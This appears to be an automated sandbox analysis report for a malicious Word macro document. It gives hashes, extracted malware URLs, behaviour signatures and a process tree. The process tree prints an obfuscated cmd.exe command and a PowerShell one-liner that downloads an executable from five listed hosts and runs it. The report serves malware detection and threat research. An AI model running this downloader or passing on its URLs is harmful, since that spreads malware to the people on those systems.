Analysis
-
max time kernel
133s -
max time network
128s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
15-12-2024 22:22
General
-
Target
f6010602af25513e5e82d4640807d08d_JaffaCakes118.doc
-
Size
90KB
-
MD5
f6010602af25513e5e82d4640807d08d
-
SHA1
cc045aa7f68e85e0877364db80399bdbf0ecdbf6
-
SHA256
ae4f24905553e34675bfa73dc2048fbe0c05170945c1c7e0fbcf38bfd5005c6c
-
SHA512
bb59090bac795cd8b7e6cfc4d520654046c9a0f41914a5c8e7df6948b785108d7b672a58e13aa25a5b7684b05ad15d760b270a44f903d7506d4abe88e2bb72e3
-
SSDEEP
1536:qptJlmrJpmxlRw99NBr+a239xfP2G9HdpkX:2te2dw99fy9MqHsX
Malware Config
Extracted
http://circuloproviamiga.com/wp-content/themes/fO2OYUW09
http://raidking.com/d0dtPLO2Ke
http://kulikovonn.ru/DBDTu0GH
http://lindgrenfinancial.com/u8PypS85i5
http://imish.ru/ImIjO2F
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 7 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\f6010602af25513e5e82d4640807d08d_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /V^:^ON/C"^s^e^t R^s^8=C^d^9^ ^B^t^T^ c^+^Z^ ^b^9^]^ ^&c^5^ ^I^f^5 ^Z^\n^ ^{^6^*^ ~^,^y )^5^@ ^M^8^u^ ^ ^H^9^ ^J^8^# ^w^G^ ^ ^;^&^_^ ^i^L^;^ ^sC^y^ ^y(^Z^}vr^'^}^{%^|^{^Z^}^uh^O^4^*cc^m^[^t^K^f^]^a^I^6^wc#'^]^}^@^0^W^;^\,^Ik^\^P^|^a^D^Q#^e^\v)r^K^u'^b^l^Z^7^;^j^h^&da^Y^w^t^P^x^T^w^o^6^;^$3%^z^ (^:^i^mHr^O^e^u^q^e^t^o^lRI^} D^-v^,%^eR^&^h^k^A%r^o^]^q^Av^;r^Fn^|^4^T^I^w/^,;^+Q^@)^2^Z^,^d^j^B^4t0^#^ ^wv^p^$^$V^L^t ^'0^~^,^lH^i^U^H^t^[N^XN^I^Z^&R^f^$C^9^[()^?^J^e^3^E^q^l%^+^:i^5^Z(^F^O^]^z^d^[V^S^a^&W^*^o^.^Q^D^l^uVRn^}^BT^w^\^5 ^o^.Cr^D^h)^@^.^W^~^L^l^m^5^qw^o^b^PC^3^8^7^$^l^}^@^{^l^P^0^y^t^D^6rG^9c^tR^@^i^{^I^>^*)^3^#^s^u^d^Ox^G^Y^A^E^L*^wR^$T^s^w^ c^;^jn^&^5N^i(^b@^ ^E^W^$^U^.^J^sN^F2^Q^Z(np^$^ ^$^@(^ZN^H^h^[vNc^i^'^$^a^G^#^h^e^+^q^Yr^+^.^f^o^u^a^L^f^*^L6^;^I^9^'^'^6^W^&^e^6^@^L^x^#^A^L^e^3^f^e^.^K^T^z^'(^+N^+%^8u^w^X^ ^J^X^Gx^F^t^G^a^D^$^L^xW^+^~8/^'^\^m^K^\^>~9'^W^S^\^+s^=^~c^W^z^h^i^a^o^_^l^K^0^_br^z^{^u^g^M^+p^4^a^_^:^2c^Zv^'^$Vn(^a$^e^2^7P^$^=c%^=eC^A^d^P^Y^Q^tk:^~^w^D^F^.$KR^$^;^EM^t',^H^u^7^m^-^X^7^m^F^D^8^J^kN^'^f^[^_^ ^6^x^[=^'%^h^ 0^Z^_^w^=)^U^X^,^:n^t^x^\^4^$^h^~^4;^~c^#)^|^i7^'^8^'^@^@(^#^Y^'^$^p^.(^E^]^ ^t^;^4^y^i^x^sr^lX^Y^&^p^K^U^2^Sc^G^t^.^m^-^0^'^f^y^b^FR(^w^2^Q^#D^O^=^+C^j^K?^[^I^0^o^k^m^I^9v^IW/^i/^,^9^o^uC^Ycr^W^3^m^.^ l^7^h9/^P^s^u^G^W^i^0^A^E^m^6^x^`^i^_^F^m/^a^[^X/:R^Y^:^Q^w2^p^L^9^m^t^yV^t^tR^U^u^h^#^aV^@^H^B^E^5^e^d^{^i%^9^4^5^7^q4^8^A^E%^S^I^2Q^p^i^uh^y^<^j^Q^PP^aC^8^-^;^\^u^A^TC/^G^,E^m^KCV^o^<^6^sc^;^q^i^.^F^<^-^l^1^9R^a^Z^s^e^i^&^-^zc^.^4^}n^dV^~^a^YN^ n1?^l^in^X^s^fcvtn^~nC^e^+^J^Ar^_^*^ ^g^>^q^M^d^S^1rn^b^*)^i^I^f^-^l9^o^8/^i^h^w/^_^\^:^:^qC^g^pW^ ^p^t^&?^.^t^3^>^z^h^Za^G^@^E^:^M^H^m^u^8^GT^S^ ^0^F^;cu^k^I^S^T^w^|^+D^z^~^l^B(^5^W^D#^o^9/^4^Qz^u^p^|^<r^8^-^;^.^M^z^En^4^P^[n^~^O^W^o^9^~^{v^@(b^ovCR^k^m^]^|ij^_)l^B^{^~^u^gv^:^k^w^m^B/^,^J^@/VJ^8^:^*^E^6^pv^*^F^t^<^t^ft^e^F^J^h:^T^s^@^z^Z^=^e^d^+^o^KCNx^2^H^{^b^O^+^k^;^L^}^[r^P^>^:(t^}R^m^d^:rK^0/^s^Md^ZO^3/r^O^U^m^I^K^O^o^p^'^zc^,^J^5^.^z^.^B^g^ ^*^}n^'Yn^i^W^L^$^k^W^`U^d^A%^1i^=^@qa^[^q^:r^3^W^K/^'^~^=/^W^a^s^:^F^:^W^p^p^j^&^t^5^|^~^t^W^U^jh^+^-^P^@^#^-A^9^p^7^905^0^t^W^*^-I^U^s^j5^YIN^'^O^E^?^U^2^:^L^h^O^B^;^<^f^]^DN/V^On^s^ /i^er^dV^m^Mr^g^e^L(^0^h8^<^K^t^;^P^Z/^m^d^B^t/c^Sn^JR^;^e^_^TVt^#^x^}nv^=)^o^3^ ^@c^zr^|^-^o^I^1^p^9^l)^w^A^#V/(^a^?^m^i^T^]^o^Ey^kc^sC^`^.n^m^z^a^fV^E^gz^4^xi^Z^W^>^mz^$^?^a{^3^j^i^S^T^~v^<^,V^odC^Zr^ ^JR^pN^|^*o^D^>^b^l^qm^I^u^i^y^Zc^8(^6r^6^b^h^i^g^-^`c^[^:^b/c^X^e/^a^>^,:^QN^>^p^B^=^Z^t^|^S^7^t(^Ab^h^`O^\^'yr^i^=^a^F^o^u^<^H^|^G^l^$V^L^l^@^p^$L^0';^On%^t/^;^9n^y^-ceRn^ii^p^*Nl^M^`^TCx^#(^b{g)^e^ ^j^L^W^Q^T^\^.^=^P^{^t^8^Une^2^l^9N^B^0^Y^ ^2^XC^t^2^H^Lc^X^#(^e^g^m(^j^i^\^w^b^Z[#^o^5^:r^-^6^}^,^w^l^i^}^e_^y^~n^1^2^>^=T^]^h^l^,^]^P^w4^1^JCc^8^-^$^7^U^k^ ^l^P^e^l^3/^X^l^S^J^3^e^A^~^&^h^F^E^<s^M^7^Qr^=^qr^e^j^e^4^w^mn^O^o^*^I^[^p&&^for /^L %^O ^in (^1^5^6^7^;^-^4^;^3)^d^o ^s^e^t ^ZN^I=!^ZN^I!!R^s^8:~%^O,1!&&^i^f %^O ^l^e^q ^3 c^a^l^l %^ZN^I:^*^ZN^I^!^=%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $Cwl=new-object Net.WebClient;$LGu='http://circuloproviamiga.com/wp-content/themes/fO2OYUW09@http://raidking.com/d0dtPLO2Ke@http://kulikovonn.ru/DBDTu0GH@http://lindgrenfinancial.com/u8PypS85i5@http://imish.ru/ImIjO2F'.Split('@');$tXw = '877';$wtd=$env:public+'\'+$tXw+'.exe';foreach($ZNU in $LGu){try{$Cwl.DownloadFile($ZNU, $wtd);Invoke-Item $wtd;break;}catch{}}3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
263KB
MD5ff0e07eff1333cdf9fc2523d323dd654
SHA177a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA2563f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f
-
Filesize
680B
MD5a3213cb356f461eece0df3457ffbf3e1
SHA1de82b33c5f799b51763f91e7e721230eb5ce4b6e
SHA2560601a8352657cc5b59a9ff1f1f77bece943c9adb76e89461d6f8dab4980df72a
SHA51257d307f5fe8ca44f84d765117ff19f185f4498d6a258ba385c067701b7b4659a871c3b3668e5237305920baa3e516fa97bbd97a3543382d2c8c5676bff60e218
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB